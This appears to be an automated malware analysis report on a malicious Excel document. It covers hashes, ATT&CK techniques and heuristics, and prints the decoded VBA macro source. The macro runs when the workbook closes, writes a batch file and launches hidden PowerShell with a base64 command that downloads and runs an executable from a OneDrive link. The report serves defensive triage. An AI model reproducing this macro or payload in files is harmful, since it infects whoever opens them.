Office (OLE) malware analysis — malicious · ad374191e1c30135

MALICIOUS

Office (OLE)

10.5 KB First seen: 2021-10-12

MD5: a87b9a0ae2df38ec182763cfe3605c21 SHA-1: ec61bfcea0d717cb6e0f381ecdbd20def2bf5260 SHA-256: ad374191e1c301357be28b0c9c2edab53bd4b76cbb59c3e6241d636edb795b36

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The VBA macros within the document contain obfuscated PowerShell commands. Specifically, the macro reassembles the string 'JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBQAGgAcQBvAGUAbQB2AHcAZwB6AGgAcQBsAGUAZQBpAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9ADYANgBDAEEAQgA0AEIAQwBFADIAMQA2AEIAQgA3ADkAJgByAGUAcwBpAGQAPQA2ADYAQwBBAEIANABCAEMARQAyADEANgBCAEIANwA5ACUAMgAxADIANwAxACYAYQB1AHQAaABrAGUAeQA9AEEASgBEADAAWQBtAGQAbQBrAE4AQwBuAGEAZgBjACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=" which decodes to a PowerShell command that downloads a file from 'https://onedrive.live.com/download?cid=66CAA4BCE216BB79&resid=66CAA4BCE216BB79%212121&authkye=AJD0YmdmkCnNafc' and executes it. The use of Shell() and the obfuscated PowerShell indicates a downloader functionality, likely delivered via spearphishing attachment.

Heuristics 4

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5695 bytes
SHA-256: `ecf5a302c4f3c20c32022c20d46134d61035d292a8b2fdfbe4b35d9a4074409e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) On Error Resume Next Dim i As Double Dim batch As String Dim call1 As String Dim enc As String enc = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBQAGgAcQBvAGUAbQB2AHcAZwB6AGgAcQBsAGUAZQBpAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBkAHIAaQB2AGUALgBsAGkAdgBlAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQAPwBjAGkAZAA9ADYANgBDAEEAQgA0AEIAQwBFADIAMQA2AEIAQgA3ADkAJgByAGUAcwBpAGQAPQA2ADYAQwBBAEIANABCAEMARQAyADEANgBCAEIANwA5ACUAMgAxADIANwAxACYAYQB1AHQAaABrAGUAeQA9AEEASgBEADAAWQBtAGQAbQBrAE4AQwBuAGEAZgBjACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=" call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe" ActiveWorkbook.Save batch = "Xvutvdwwwhufojbtme.bat" Open batch For Output As #1 Print #1, "start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc Close #1 i = Shell(batch, 0) End Sub Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean) End Sub Private Sub Workbook_SheetCalculate(ByVal Sh As Object) End Sub Private Sub Cellss() End Sub Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range) End Sub Attribute VB_Name = "Start" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "1. Add" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "2. Fill" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "3. Split" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "4. Transpose" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "5. Sort & filter" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "6. Tables" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "7. Drop-downs" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False A ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.